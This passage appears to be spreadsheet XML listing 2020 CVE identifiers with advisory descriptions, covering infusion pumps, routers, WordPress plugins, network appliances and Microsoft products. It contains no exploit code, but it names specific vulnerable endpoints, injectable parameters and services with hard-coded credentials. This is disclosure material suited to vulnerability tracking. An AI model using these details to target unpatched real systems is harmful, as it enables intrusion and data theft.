    <t>Sigma Spectrum Infusion System v's6.x (model 35700BAX) and Baxter Spectrum Infusion System Version(s) 8.x (model 35700BAX2) at the application layer uses an unauthenticated clear-text communication channel to send and receive system status and operational data. This could allow an attacker that has circumvented network security measures to view sensitive non-private data or to perform a man-in-the-middle attack.</t>
  </si>
  <si>
    <t>CVE-2020-12041</t>
  </si>
  <si>
    <t>The Baxter Spectrum WBM (v17, v20D29, v20D30, v20D31, and v22D24) telnet Command-Line Interface, grants access to sensitive data stored on the WBM that permits temporary configuration changes to network settings of the WBM, and allows the WBM to be rebooted. Temporary configuration changes to network settings are removed upon reboot.</t>
  </si>
  <si>
    <t>CVE-2020-12042</t>
  </si>
  <si>
    <t>Opto 22 SoftPAC Project Version 9.6 and prior. Paths specified within the zip files used to update the SoftPAC firmware are not sanitized. As a result, an attacker with user privileges can gain arbitrary file write access with system access.</t>
  </si>
  <si>
    <t>CVE-2020-12043</t>
  </si>
  <si>
    <t>The Baxter Spectrum WBM (v17, v20D29, v20D30, v20D31, and v22D24) when configured for wireless networking the FTP service operating on the WBM remains operational until the WBM is rebooted.</t>
  </si>
  <si>
    <t>CVE-2020-12045</t>
  </si>
  <si>
    <t>The Baxter Spectrum WBM (v17, v20D29, v20D30, v20D31, and v22D24) when used in conjunction with a Baxter Spectrum v8.x (model 35700BAX2), operates a Telnet service on Port 1023 with hard-coded credentials.</t>
  </si>
  <si>
    <t>CVE-2020-12046</t>
  </si>
  <si>
    <t>Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC’s firmware files’ signatures are not verified upon firmware update. This allows an attacker to replace legitimate firmware files with malicious files.</t>
  </si>
  <si>
    <t>CVE-2020-12047</t>
  </si>
  <si>
    <t>The Baxter Spectrum WBM (v17, v20D29, v20D30, v20D31, and v22D24), when used with a Baxter Spectrum v8.x (model 35700BAX2) in a factory-default wireless configuration enables an FTP service with hard-coded credentials.</t>
  </si>
  <si>
    <t>CVE-2020-12048</t>
  </si>
  <si>
    <t>Phoenix Hemodialysis Delivery System SW 3.36 and 3.40, The Phoenix Hemodialysis device does not support data-in-transit encryption (e.g., TLS/SSL) when transmitting treatment and prescription data on the network between the Phoenix system and the Exalis dialysis data management tool. An attacker with access to the network could observe sensitive treatment and prescription data sent between the Phoenix system and the Exalis tool.</t>
  </si>
  <si>
    <t>CVE-2020-12049</t>
  </si>
  <si>
    <t>An issue was discovered in dbus &gt;= 1.3.0 before 1.12.18. The DBusServer in libdbus, as used in dbus-daemon, leaks file descriptors when a message exceeds the per-message file descriptor limit. A local attacker with access to the D-Bus system bus or another system service's private AF_UNIX socket could use this to make the system service reach its file descriptor limit, denying service to subsequent D-Bus clients.</t>
  </si>
  <si>
    <t>CVE-2020-1205</t>
  </si>
  <si>
    <t>CVE-2020-12050</t>
  </si>
  <si>
    <t>SQLiteODBC 0.9996, as packaged for certain Linux distributions as 0.9996-4, has a race condition leading to root privilege escalation because any user can replace a /tmp/sqliteodbc$$ file with new contents that cause loading of an arbitrary library.</t>
  </si>
  <si>
    <t>CVE-2020-12051</t>
  </si>
  <si>
    <t>The CentralAuth extension through REL1_34 for MediaWiki allows remote attackers to obtain sensitive hidden account information via an api.php?action=query&amp;meta=globaluserinfo&amp;guiuser= request. In other words, the information can be retrieved via the action API even though access would be denied when simply visiting wiki/Special:CentralAuth in a web browser.</t>
  </si>
  <si>
    <t>CVE-2020-12052</t>
  </si>
  <si>
    <t>Grafana version &lt; 6.7.3 is vulnerable for annotation popup XSS.</t>
  </si>
  <si>
    <t>CVE-2020-12053</t>
  </si>
  <si>
    <t>In Unisys Stealth 3.4.x, 4.x and 5.x before 5.0.026, if certificate-based authorization is used without HTTPS, an endpoint could be authorized without a private key.</t>
  </si>
  <si>
    <t>CVE-2020-12054</t>
  </si>
  <si>
    <t>The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query). Also affected are 16 themes (if the plugin is enabled) by the same author: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.</t>
  </si>
  <si>
    <t>CVE-2020-12058</t>
  </si>
  <si>
    <t>Several XSS vulnerabilities in osCommerce CE Phoenix before 1.0.6.0 allow an attacker to inject and execute arbitrary JavaScript code. The malicious code can be injected as follows: the page parameter to catalog/admin/order_status.php, catalog/admin/tax_rates.php, catalog/admin/languages.php, catalog/admin/countries.php, catalog/admin/tax_classes.php, catalog/admin/reviews.php, or catalog/admin/zones.php; or the zpage or spage parameter to catalog/admin/geo_zones.php.</t>
  </si>
  <si>
    <t>CVE-2020-12059</t>
  </si>
  <si>
    <t>An issue was discovered in Ceph through 13.2.9. A POST request with an invalid tagging XML can crash the RGW process by triggering a NULL pointer exception.</t>
  </si>
  <si>
    <t>CVE-2020-1206</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12061</t>
  </si>
  <si>
    <t>An issue was discovered in Nitrokey FIDO U2F firmware through 1.1. Communication between the microcontroller and the secure element transmits credentials in plain. This allows an adversary to eavesdrop the communication and derive the secrets stored in the microcontroller. As a result, the attacker is able to arbitrarily manipulate the firmware of the microcontroller.</t>
  </si>
  <si>
    <t>CVE-2020-12062</t>
  </si>
  <si>
    <t>** DISPUTED ** The scp client in OpenSSH 8.2 incorrectly sends duplicate responses to the server upon a utimes system call failure, which allows a malicious unprivileged user on the remote server to overwrite arbitrary files in the client's download directory by creating a crafted subdirectory anywhere on the remote server. The victim must use the command scp -rp to download a file hierarchy containing, anywhere inside, this crafted subdirectory. NOTE: the vendor points out that "this attack can achieve no more than a hostile peer is already able to achieve within the scp protocol" and "utimes does not fail under normal circumstances."</t>
  </si>
  <si>
    <t>CVE-2020-12063</t>
  </si>
  <si>
    <t>** DISPUTED ** A certain Postfix 2.10.1-7 package could allow an attacker to send an email from an arbitrary-looking sender via a homoglyph attack, as demonstrated by the similarity of \xce\xbf to the 'o' character. This is potentially relevant when the /etc/postfix/sender_login feature is used, because a spoofed outbound message that uses a configured sender address is blocked with a "Sender address rejected: not logged in" error message, but a spoofed outbound message that uses a homoglyph of a configured sender address is not blocked. NOTE: some third parties argue that any missed blocking of spoofed outbound messages - except for exact matches to a sender address in the /etc/postfix/sender_login file - is outside the design goals of Postfix and thus cannot be considered a Postfix vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-12066</t>
  </si>
  <si>
    <t>CServer::SendMsg in engine/server/server.cpp in Teeworlds 0.7.x before 0.7.5 allows remote attackers to shut down the server.</t>
  </si>
  <si>
    <t>CVE-2020-12068</t>
  </si>
  <si>
    <t>An issue was discovered in CODESYS Development System before 3.5.16.0. CODESYS WebVisu and CODESYS Remote TargetVisu are susceptible to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-1207</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310.</t>
  </si>
  <si>
    <t>CVE-2020-12070</t>
  </si>
  <si>
    <t>The Advanced Woo Search plugin version through 1.99 for Wordpress suffers from a sensitive information disclosure vulnerability in every ajax search request via the sql field to includes/class-aws-search.php.</t>
  </si>
  <si>
    <t>CVE-2020-12071</t>
  </si>
  <si>
    <t>Anchor 0.12.7 allows admins to cause XSS via crafted post content.</t>
  </si>
  <si>
    <t>CVE-2020-12073</t>
  </si>
  <si>
    <t>The responsive-add-ons plugin before 2.2.7 for WordPress has incorrect access control for wp-admin/admin-ajax.php?action= requests.</t>
  </si>
  <si>
    <t>CVE-2020-12074</t>
  </si>
  <si>
    <t>The users-customers-import-export-for-wp-woocommerce plugin before 1.3.9 for WordPress allows subscribers to import administrative accounts via CSV.</t>
  </si>
  <si>
    <t>CVE-2020-12075</t>
  </si>
  <si>
    <t>The data-tables-generator-by-supsystic plugin before 1.9.92 for WordPress lacks capability checks for AJAX actions.</t>
  </si>
  <si>
    <t>CVE-2020-12076</t>
  </si>
  <si>
    <t>The data-tables-generator-by-supsystic plugin before 1.9.92 for WordPress lacks CSRF nonce checks for AJAX actions. One consequence of this is stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-12077</t>
  </si>
  <si>
    <t>The mappress-google-maps-for-wordpress plugin before 2.53.9 for WordPress does not correctly implement AJAX functions with nonces (or capability checks), leading to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-12078</t>
  </si>
  <si>
    <t>An issue was discovered in Open-AudIT 3.3.1. There is shell metacharacter injection via attributes to an open-audit/configuration/ URI. An attacker can exploit this by adding an excluded IP address to the global discovery settings (internally called exclude_ip). This exclude_ip value is passed to the exec function in the discoveries_helper.php file (inside the all_ip_list function) without being filtered, which means that the attacker can provide a payload instead of a valid IP address.</t>
  </si>
  <si>
    <t>CVE-2020-12079</t>
  </si>
  <si>
    <t>Beaker before 0.8.9 allows a sandbox escape, enabling system access and code execution. This occurs because Electron context isolation is not used, and therefore an attacker can conduct a prototype-pollution attack against the Electron internal messaging API.</t>
  </si>
  <si>
    <t>CVE-2020-1208</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1236.</t>
  </si>
  <si>
    <t>CVE-2020-12080</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability has been identified in FlexNet Publisher's lmadmin.exe version 11.16.6. A certain message protocol can be exploited to cause lmadmin to crash.</t>
  </si>
  <si>
    <t>CVE-2020-12081</t>
  </si>
  <si>
    <t>An information disclosure vulnerability has been identified in FlexNet Publisher lmadmin.exe 11.14.0.2. The web portal link can be used to access to system files or other important files on the system.</t>
  </si>
  <si>
    <t>CVE-2020-12082</t>
  </si>
  <si>
    <t>A stored cross-site scripting issue impacts certain areas of the Web UI for Code Insight v7.x releases up to and including 2020 R1 (7.11.0-64).</t>
  </si>
  <si>
    <t>CVE-2020-12083</t>
  </si>
  <si>
    <t>An elevated privileges issue related to Spring MVC calls impacts Code Insight v7.x releases up to and including 2020 R1 (7.11.0-64).</t>
  </si>
  <si>
    <t>CVE-2020-1209</t>
  </si>
  <si>
    <t>CVE-2020-1210</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1200, CVE-2020-1452, CVE-2020-1453, CVE-2020-1576, CVE-2020-1595.</t>
  </si>
  <si>
    <t>CVE-2020-12100</t>
  </si>
  <si>
    <t>In Dovecot before 2.3.11.3, uncontrolled recursion in submission, lmtp, and lda allows remote attackers to cause a denial of service (resource consumption) via a crafted e-mail message with deeply nested MIME parts.</t>
  </si>
  <si>
    <t>CVE-2020-12101</t>
  </si>
  <si>
    <t>The address-management feature in xt:Commerce 5.1 to 6.2.2 allows remote authenticated users to zero out other user's stored addresses by manipulating an id field in the POST request for altering an address.</t>
  </si>
  <si>
    <t>CVE-2020-12102</t>
  </si>
  <si>
    <t>In Tiny File Manager 2.4.1, there is a Path Traversal vulnerability in the ajax recursive directory listing functionality. This allows authenticated users to enumerate directories and files on the filesystem (outside of the application scope).</t>
  </si>
  <si>
    <t>CVE-2020-12103</t>
  </si>
  <si>
    <t>In Tiny File Manager 2.4.1 there is a vulnerability in the ajax file backup copy functionality which allows authenticated users to create backup copies of files (with .bak extension) outside the scope in the same directory in which they are stored.</t>
  </si>
  <si>
    <t>CVE-2020-12104</t>
  </si>
  <si>
    <t>The Import feature in the wp-advanced-search plugin 3.3.6 for WordPress is vulnerable to authenticated SQL injection via an uploaded .sql file. An attacker can use this to execute SQL commands without any validation.</t>
  </si>
  <si>
    <t>CVE-2020-12105</t>
  </si>
  <si>
    <t>OpenConnect through 8.08 mishandles negative return values from X509_check_ function calls, which might assist attackers in performing man-in-the-middle attacks.</t>
  </si>
  <si>
    <t>CVE-2020-12106</t>
  </si>
  <si>
    <t>The Web portal of the WiFi module of VPNCrypt M10 2.6.5 allows unauthenticated users to send HTTP POST request to several critical Administrative functions such as, changing credentials of the Administrator account or connect the product to a rogue access point.</t>
  </si>
  <si>
    <t>CVE-2020-12107</t>
  </si>
  <si>
    <t>The Web portal of the WiFi module of VPNCrypt M10 2.6.5 allows command injection via a text field, which allow full control over this module's Operating System.</t>
  </si>
  <si>
    <t>CVE-2020-12108</t>
  </si>
  <si>
    <t>/options/mailman in GNU Mailman before 2.1.31 allows Arbitrary Content Injection.</t>
  </si>
  <si>
    <t>CVE-2020-12109</t>
  </si>
  <si>
    <t>Certain TP-Link devices allow Command Injection. This affects NC200 2.1.9 build 200225, NC210 1.0.9 build 200304, NC220 1.3.0 build 200304, NC230 1.3.0 build 200304, NC250 1.3.0 build 200304, NC260 1.5.2 build 200304, and NC450 1.5.3 build 200304.</t>
  </si>
  <si>
    <t>CVE-2020-1211</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory, aka 'Connected Devices Platform Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12110</t>
  </si>
  <si>
    <t>Certain TP-Link devices have a Hardcoded Encryption Key. This affects NC200 2.1.9 build 200225, N210 1.0.9 build 200304, NC220 1.3.0 build 200304, NC230 1.3.0 build 200304, NC250 1.3.0 build 200304, NC260 1.5.2 build 200304, and NC450 1.5.3 build 200304.</t>
  </si>
  <si>
    <t>CVE-2020-12111</t>
  </si>
  <si>
    <t>Certain TP-Link devices allow Command Injection. This affects NC260 1.5.2 build 200304 and NC450 1.5.3 build 200304.</t>
  </si>
  <si>
    <t>CVE-2020-12112</t>
  </si>
  <si>
    <t>BigBlueButton before 2.2.5 allows remote attackers to obtain sensitive files via Local File Inclusion.</t>
  </si>
  <si>
    <t>CVE-2020-12113</t>
  </si>
  <si>
    <t>BigBlueButton before 2.2.4 allows XSS via closed captions because dangerouslySetInnerHTML in React is used.</t>
  </si>
  <si>
    <t>CVE-2020-12114</t>
  </si>
  <si>
    <t>A pivot_root race condition in fs/namespace.c in the Linux kernel 4.4.x before 4.4.221, 4.9.x before 4.9.221, 4.14.x before 4.14.178, 4.19.x before 4.19.119, and 5.x before 5.3 allows local users to cause a denial of service (panic) by corrupting a mountpoint reference counter.</t>
  </si>
  <si>
    <t>CVE-2020-12116</t>
  </si>
  <si>
    <t>Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-12117</t>
  </si>
  <si>
    <t>Moxa Service in Moxa NPort 5150A firmware version 1.5 and earlier allows attackers to obtain sensitive configuration values via a crafted packet to UDP port 4800. NOTE: Moxa Service is an unauthenticated service that runs upon a first-time installation but can be disabled without ill effect.</t>
  </si>
  <si>
    <t>CVE-2020-12118</t>
  </si>
  <si>
    <t>The keygen protocol implementation in Binance tss-lib before 1.2.0 allows attackers to generate crafted h1 and h2 parameters in order to compromise a signing round or obtain sensitive information from other parties.</t>
  </si>
  <si>
    <t>CVE-2020-12119</t>
  </si>
  <si>
    <t>Ledger Live before 2.7.0 does not handle Bitcoin's Replace-By-Fee (RBF). It increases the user's balance with the value of an unconfirmed transaction as soon as it is received (before the transaction is confirmed) and does not decrease the balance when it is canceled. As a result, users are exposed to basic double spending attacks, amplified double spending attacks, and DoS attacks without user consent.</t>
  </si>
  <si>
    <t>CVE-2020-1212</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'OLE Automation Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-12120</t>
  </si>
  <si>
    <t>The Correos Express addon for PrestaShop 1.6 through 1.7 allows remote attackers to obtain sensitive information, such as a service's owner password that can be used to modify orders via SOAP. Attackers can also retrieve information about orders or buyers.</t>
  </si>
  <si>
    <t>CVE-2020-12122</t>
  </si>
  <si>
    <t>In Max Secure Max Spyware Detector 1.0.0.044, the driver file (MaxProc64.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x2200019. (This also extends to the various other products from Max Secure that include MaxProc64.sys.)</t>
  </si>
  <si>
    <t>CVE-2020-12123</t>
  </si>
  <si>
    <t>CSRF vulnerabilities in the /cgi-bin/ directory of the WAVLINK WN530H4 M30H4.V5030.190403 allow an attacker to remotely access router endpoints, because these endpoints do not contain CSRF tokens. If a user is authenticated in the router portal, then this attack will work.</t>
  </si>
  <si>
    <t>CVE-2020-12124</t>
  </si>
  <si>
    <t>A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-12125</t>
  </si>
  <si>
    <t>A remote buffer overflow vulnerability in the /cgi-bin/makeRequest.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary machine instructions as root without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-12126</t>
  </si>
  <si>
    <t>Multiple authentication bypass vulnerabilities in the /cgi-bin/ endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allow an attacker to leak router settings, change configuration variables, and cause denial of service via an unauthenticated endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-12127</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-12128</t>
  </si>
  <si>
    <t>DONG JOO CHO File Transfer iFamily 2.1 allows directory traversal related to the ./etc/ path.</t>
  </si>
  <si>
    <t>CVE-2020-12129</t>
  </si>
  <si>
    <t>The AirDisk Pro app 5.5.3 for iOS allows XSS via the createFolder parameter of the Create Folder function.</t>
  </si>
  <si>
    <t>CVE-2020-1213</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260.</t>
  </si>
  <si>
    <t>CVE-2020-12130</t>
  </si>
  <si>
    <t>The AirDisk Pro app 5.5.3 for iOS allows XSS via the deleteFile parameter of the Delete function.</t>
  </si>
  <si>
    <t>CVE-2020-12131</t>
  </si>
  <si>
    <t>The AirDisk Pro app 5.5.3 for iOS allows XSS via the devicename parameter (shown next to the UI logo).</t>
  </si>
  <si>
    <t>CVE-2020-12132</t>
  </si>
  <si>
    <t>Fifthplay S.A.M.I before 2019.3_HP2 allows unauthenticated stored XSS via a POST request.</t>
  </si>
  <si>
    <t>CVE-2020-12133</t>
  </si>
  <si>
    <t>The Apros Evolution, ConsciusMap, and Furukawa provisioning systems through 2.8.1 allow remote code execution because of javax.faces.ViewState Java deserialization.</t>
  </si>
  <si>
    <t>CVE-2020-12134</t>
  </si>
  <si>
    <t>Nanometrics Centaur through 4.3.23 and TitanSMA through 4.2.20 mishandle access control for the syslog log.</t>
  </si>
  <si>
    <t>CVE-2020-12135</t>
  </si>
  <si>
    <t>bson before 0.8 incorrectly uses int rather than size_t for many variables, parameters, and return values. In particular, the bson_ensure_space() parameter bytesNeeded could have an integer overflow via properly constructed bson input.</t>
  </si>
  <si>
    <t>CVE-2020-12137</t>
  </si>
  <si>
    <t>GNU Mailman 2.x before 2.1.30 uses the .obj extension for scrubbed application/octet-stream MIME parts. This behavior may contribute to XSS attacks against list-archive visitors, because an HTTP reply from an archive web server may lack a MIME type, and a web browser may perform MIME sniffing, conclude that the MIME type should have been text/html, and execute JavaScript code.</t>
  </si>
  <si>
    <t>CVE-2020-12138</t>
  </si>
  <si>
    <t>AMD ATI atillk64.sys 5.11.9.0 allows low-privileged users to interact directly with physical memory by calling one of several driver routines that map physical memory into the virtual address space of the calling process. This could enable low-privileged users to achieve NT AUTHORITY\SYSTEM privileges via a DeviceIoControl call associated with MmMapIoSpace, IoAllocateMdl, MmBuildMdlForNonPagedPool, or MmMapLockedPages.</t>
  </si>
  <si>
    <t>CVE-2020-1214</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1213, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260.</t>
  </si>
  <si>
    <t>CVE-2020-12140</t>
  </si>
  <si>
    <t>A buffer overflow in os/net/mac/ble/ble-l2cap.c in the BLE stack in Contiki-NG 4.4 and earlier allows an attacker to execute arbitrary code via malicious L2CAP frames.</t>
  </si>
  <si>
    <t>CVE-2020-12141</t>
  </si>
  <si>
    <t>An out-of-bounds read in the SNMP stack in Contiki-NG 4.4 and earlier allows an attacker to cause a denial of service and potentially disclose information via crafted SNMP packets to snmp_ber_decode_string_len_buffer in os/net/app-layer/snmp/snmp-ber.c.</t>
  </si>
  <si>
    <t>CVE-2020-12142</t>
  </si>
  <si>
    <t>1. IPSec UDP key material can be retrieved from machine-to-machine interfaces and human-accessible interfaces by a user with admin credentials. Such a user, with the required system knowledge, could use this material to decrypt in-flight communication. 2. The vulnerability requires administrative access and shell access to the EdgeConnect appliance. An admin user can access IPSec seed and nonce parameters using the CLI, REST APIs, and the Linux shell.</t>
  </si>
  <si>
    <t>CVE-2020-12143</t>
  </si>
  <si>
    <t>The certificate used to identify Orchestrator to EdgeConnect devices is not validated, which makes it possible for someone to establish a TLS connection from EdgeConnect to an untrusted Orchestrator.</t>
  </si>
  <si>
    <t>CVE-2020-12144</t>
  </si>
  <si>
    <t>The certificate used to identify the Silver Peak Cloud Portal to EdgeConnect devices is not validated. This makes it possible for someone to establish a TLS connection from EdgeConnect to an untrusted portal.</t>
  </si>
  <si>
    <t>CVE-2020-12145</t>
  </si>
  <si>
    <t>Silver Peak Unity Orchestrator versions prior to 8.9.11+, 8.10.11+, or 9.0.1+ uses HTTP headers to authenticate REST API calls from localhost. This makes it possible to log in to Orchestrator by introducing an HTTP HOST header set to 127.0.0.1 or localhost. Orchestrator instances that are hosted by customers –on-premise or in a public cloud provider –are affected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-12146</t>
  </si>
  <si>
    <t>In Silver Peak Unity Orchestrator versions prior to 8.9.11+, 8.10.11+, or 9.0.1+, an authenticated user can access, modify, and delete restricted files on the Orchestrator server using the/debugFiles REST API.</t>
  </si>
  <si>
    <t>CVE-2020-12147</t>
  </si>
  <si>
    <t>In Silver Peak Unity Orchestrator versions prior to 8.9.11+, 8.10.11+, or 9.0.1+, an authenticated user can make unauthorized MySQL queries against the Orchestrator database using the /sqlExecution REST API, which had been used for internal testing.</t>
  </si>
  <si>
    <t>CVE-2020-12148</t>
  </si>
  <si>
    <t>A command injection flaw identified in the nslookup API in Silver Peak Unity ECOSTM (ECOS) appliance software could allow an attacker to execute arbitrary commands with the privileges of the web server running on the EdgeConnect appliance. An attacker could exploit this vulnerability to establish an interactive channel, effectively taking control of the target system. This vulnerability can be exploited by an attacker with authenticated access to the Orchestrator UI or EdgeConnect UI. This affects all ECOS versions prior to : 8.1.9.15, 8.3.0.8, 8.3.1.2, 8.3.2.0, 9.0.2.0, and 9.1.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-12149</t>
  </si>
  <si>
    <t>The configuration backup/restore function in Silver Peak Unity ECOSTM (ECOS) appliance software was found to directly incorporate the user-controlled config filename in a subsequent shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. This vulnerability can be exploited by an attacker with authenticated access to the Orchestrator UI or EdgeConnect UI. This affects all ECOS versions prior to: 8.1.9.15, 8.3.0.8, 8.3.1.2, 8.3.2.0, 9.0.2.0, and 9.1.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-1215</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1213, CVE-2020-1214, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260.</t>
  </si>
  <si>
    <t>CVE-2020-1216</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1230, CVE-2020-1260.</t>
  </si>
  <si>
    <t>CVE-2020-1217</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1218</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1338.</t>
  </si>
  <si>
    <t>CVE-2020-1219</t>
  </si>
  <si>
    <t>CVE-2020-1220</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects, aka 'Microsoft Edge (Chromium-based) in IE Mode Spoofing Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1222</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Microsoft Store Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1309.</t>
  </si>
  <si>
    <t>CVE-2020-1223</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Microsoft Word for Android fails to properly handle certain files.To exploit the vulnerability, an attacker would have to convince a user to open a specially crafted URL file.The update addresses the vulnerability by correcting how Microsoft Word for Android handles specially crafted URL files., aka 'Word for Android Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1224</t>
  </si>
  <si>
    <t>exploits/macos/local/48387.txt</t>
  </si>
  <si>
    <t>Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution</t>
  </si>
  <si>
    <t>2020-04-27</t>
  </si>
  <si>
    <t>CVE-2020-12242</t>
  </si>
  <si>
    <t>Valve Source allows local users to gain privileges by writing to the /tmp/hl2_relaunch file, which is later executed in the context of a different user account.</t>
  </si>
  <si>
    <t>CVE-2020-12243</t>
  </si>
  <si>
    <t>In filter.c in slapd in OpenLDAP before 2.4.50, LDAP search filters with nested boolean expressions can result in denial of service (daemon crash).</t>
  </si>
  <si>
    <t>CVE-2020-12244</t>
  </si>
  <si>
    <t>An issue has been found in PowerDNS Recursor 4.1.0 through 4.3.0 where records in the answer section of a NXDOMAIN response lacking an SOA were not properly validated in SyncRes::processAnswer, allowing an attacker to bypass DNSSEC validation.</t>
  </si>
  <si>
    <t>CVE-2020-12245</t>
  </si>
  <si>
    <t>Grafana before 6.7.3 allows table-panel XSS via column.title or cellLinkTooltip.</t>
  </si>
  <si>
    <t>CVE-2020-12246</t>
  </si>
  <si>
    <t>Beeline Smart Box 2.0.38 routers allow "Advanced settings &gt; Other &gt; Diagnostics" OS command injection via the Ping ping_ipaddr parameter, the Nslookup nslookup_ipaddr parameter, or the Traceroute traceroute_ipaddr parameter.</t>
  </si>
  <si>
    <t>CVE-2020-12247</t>
  </si>
  <si>
    <t>In Foxit Reader and PhantomPDF before 10.0.1, and PhantomPDF before 9.7.3, attackers can obtain sensitive information from an out-of-bounds read because a text-string index continues to be used after splitting a string into two parts. A crash may also occur.</t>
  </si>
  <si>
    <t>CVE-2020-12248</t>
  </si>
  <si>
    <t>In Foxit Reader and PhantomPDF before 10.0.1, and PhantomPDF before 9.7.3, attackers can execute arbitrary code via a heap-based buffer overflow because dirty image-resource data is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-1225</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1226.</t>
  </si>
  <si>
    <t>CVE-2020-12251</t>
  </si>
  <si>
    <t>An issue was discovered in Gigamon GigaVUE 5.5.01.11. The upload functionality allows an authenticated user to change the filename value (in the POST method) from the original filename to achieve directory traversal via a ../ sequence and, for example, obtain a complete directory listing of the machine.</t>
  </si>
  <si>
    <t>CVE-2020-12252</t>
  </si>
  <si>
    <t>An issue was discovered in Gigamon GigaVUE 5.5.01.11. The upload functionality allows an arbitrary file upload for an authenticated user. If an executable file is uploaded into the www-root directory, then it could yield remote code execution via the filename parameter.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-12254</t>
  </si>
  <si>
    <t>Avira Antivirus before 5.0.2003.1821 on Windows allows privilege escalation or a denial of service via abuse of a symlink.</t>
  </si>
  <si>
    <t>CVE-2020-12255</t>
  </si>
  <si>
